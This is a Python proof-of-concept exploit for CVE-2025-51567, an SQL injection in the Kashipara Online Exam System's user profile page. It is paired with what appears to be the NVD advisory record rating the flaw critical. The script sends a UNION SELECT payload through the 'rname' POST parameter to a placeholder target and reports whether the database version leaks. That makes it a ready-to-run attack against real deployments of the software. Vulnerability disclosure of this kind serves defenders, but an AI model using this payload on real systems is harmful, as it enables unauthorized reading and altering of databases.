CVE-2025-51567

import requests import sys # CVE-2025-51567 PoC - SQL Injection in Kashipara Online Exam System # Target: /exam/user/profile.php # Parameters: rname, rcollage, rnumber, rgender, rpassword target_url = "http://target.com/exam/user/profile.php" # Basic SQL Injection PoC to extract database version payload = "' UNION SELECT 1,version(),3,4,5,6,7,8--" data = { 'rname': payload, 'rcollage': 'test_college', 'rnumber': '12345', 'rgender': 'male', 'rpassword': 'test123' } print(f"[*] Sending malicious request to {target_url}") print(f"[*] Payload: {payload}") try: response = requests.post(target_url, data=data, timeout=10) print(f"[*] Status Code: {response.status_code}") if '5.' in response.text or '8.' in response.text: print("[+] SQL Injection Confirmed! Database version leaked.") print("[+] Vulnerability is exploitable.") else: print("[-] Response does not indicate successful injection.") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") sys.exit(1)

{"cve": {"id": "CVE-2025-51567", "sourceIdentifier": "[email protected]", "published": "2026-01-12T20:15:52.763", "lastModified": "2026-01-16T17:31:06.853", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A SQL Injection was found in the /exam/user/profile.php page of kashipara Online Exam System V1.0, which allows remote attackers to execute arbitrary SQL command to get unauthorized database access via the rname, rcollage, rnumber, rgender and rpassword parameters in a POST HTTP request."}, {"lang": "es", "value": "Se encontró una inyección SQL en la página /exam/user/profile.php de kashipara Online Exam System V1.0, lo que permite a atacantes remotos ejecutar comando SQL arbitrario para obtener acceso no autorizado a la base de datos a través de los parámetros rname, rcollage, rnumber, rgender y rpassword en una solicitud HTTP POST."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jayesh:online_exam_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2CABE8E7-7159-40FF-9FF7-6608FB08D0D5"}]}]}], "references": [{"url": "https://github.com/0xBhushan/Writeups/blob/main/CVE/Kashipara/Online%20Exam%20System/SQL%20Injection-Profile%20Update.pdf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}